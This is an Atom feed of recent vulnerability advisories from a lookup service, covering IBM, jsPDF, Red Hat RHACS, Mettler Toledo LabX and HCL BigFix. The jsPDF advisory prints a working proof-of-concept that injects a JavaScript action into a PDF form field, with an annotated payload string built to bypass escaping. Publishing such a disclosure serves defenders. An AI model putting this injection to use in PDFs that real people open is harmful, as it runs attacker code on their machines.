<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T11:41:25.130207+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-01175</id>
    <title>bdu:2026-01175</title>
    <updated>2026-10-03T11:41:25.150656+00:00</updated>
    <content>bdu:2026-01175</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-01175"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2026-avi-0834</id>
    <title>certfr-2026-avi-0834 — De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquan…</title>
    <updated>2026-10-03T11:41:25.150693+00:00</updated>
    <content>certfr-2026-avi-0834</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2026-avi-0834"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-354855</id>
    <title>EUVD-2026-354855</title>
    <updated>2026-10-03T11:41:25.150712+00:00</updated>
    <content>EUVD-2026-354855</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-354855"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-24737</id>
    <title>fkie_cve-2026-24737</title>
    <updated>2026-10-03T11:41:25.150724+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>jsPDF is a library to generate PDFs in JavaScript. Prior to 4.1.0, user control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions. If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are AcroformChoiceField.addOption, AcroformChoiceField.setOptions, AcroFormCheckBox.appearanceState, and AcroFormRadioButton.appearanceState. The vulnerability has been fixed in jsPDF@4.1.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-24737"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-pqxr-3g65-p328</id>
    <title>GHSA-pqxr-3g65-p328 — jsPDF has PDF Injection in AcroFormChoiceField that allows Arbitrary JavaScript Execution</title>
    <updated>2026-10-03T11:41:25.150753+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: jspdf</p>
<p>### Impact</p>
<p>User control of properties and methods of the Acroform module allows users to inject arbitrary PDF objects, such as JavaScript actions.</p>
<p>If given the possibility to pass unsanitized input to one of the following methods or properties, a user can inject arbitrary PDF objects, such as JavaScript actions, which are executed when the victim opens the document. The vulnerable API members are:</p>
<p>* `AcroformChoiceField.addOption`
* `AcroformChoiceField.setOptions`
* `AcroFormCheckBox.appearanceState`
* `AcroFormRadioButton.appearanceState`</p>
<p>Example attack vector:</p>
<p>```js
import { jsPDF } from "jspdf"
const doc = new jsPDF();</p>
<p>var choiceField = new doc.AcroFormChoiceField();
choiceField.T = "VulnerableField";
choiceField.x = 20;
choiceField.y = 20;
choiceField.width = 100;
choiceField.height = 20;</p>
<p>// PAYLOAD:
// 1. Starts with "/" to bypass escaping.
// 2. "dummy]" closes the array.
// 3. "/AA" injects an Additional Action (Focus event).
// 4. "/JS" executes arbitrary JavaScript.
const payload = "/dummy] /AA &lt;&lt; /Fo &lt;&lt; /S /JavaScript /JS (app.alert('XSS')) &gt;&gt; &gt;&gt; /Garbage [";</p>
<p>choiceField.addOption(payload);
doc.addField(choiceField);</p>
<p>doc.save("test.pdf");
```</p>
<p>### Patches</p>
<p>The vulnerability has been fixed in jsPDF@4.1.0.</p>
<p>### Workarounds
Sanitize user input before passing it to the vulnerable API members.</p>
<p>### Credits
Research and fix: Ahmet Artuç</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-pqxr-3g65-p328"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:4466</id>
    <title>RHSA-2026:4466 — Red Hat Security Advisory: RHACS 4.8.9 security and bug fix update</title>
    <updated>2026-10-03T11:41:25.150796+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>lodash: prototype pollution in _.unset and _.omit functions golang: net/url: Memory exhaustion in query parameter parsing in net/url golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate urllib3: urllib3: Unbounded decompression chain leads to resource exhaustion urllib3: urllib3 Streaming API improperly handles highly compressed data crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API) jsPDF: jsPDF: Cross-User Data Leakage via race condition in addJS method jsPDF: jsPDF: Arbitrary code execution via unsanitized input in Acroform module</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:4466"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/vde-2026-064</id>
    <title>VDE-2026-064 — METTLER TOLEDO: LabX Standard Report on External Component Analysis - v21.3</title>
    <updated>2026-10-03T11:41:25.150826+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p>Multiple vulnerabilities have been discovered in LabX Standard v21.3.22. Most of the vulnerabilities are fixed in LabX Standard v21.4.23. The Vulnerabilities CVE-2025-69419, CVE-2026-0915, CVE-2025-15467 and CVE-2025-58187 are not yet fixed. The fix will be available in the upcoming releases.</p>
<p>Notice: LabX Standard was formerly known as LabX Cloud Local.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/vde-2026-064"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0553</id>
    <title>WID-SEC-W-2026-0553 — HCL BigFix: Mehrere Schwachstellen</title>
    <updated>2026-10-03T11:41:25.150852+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in HCL BigFix ausnutzen, um Informationen offenzulegen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, und um Dateien zu manipulieren.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0553"/>
  </entry>
</feed>
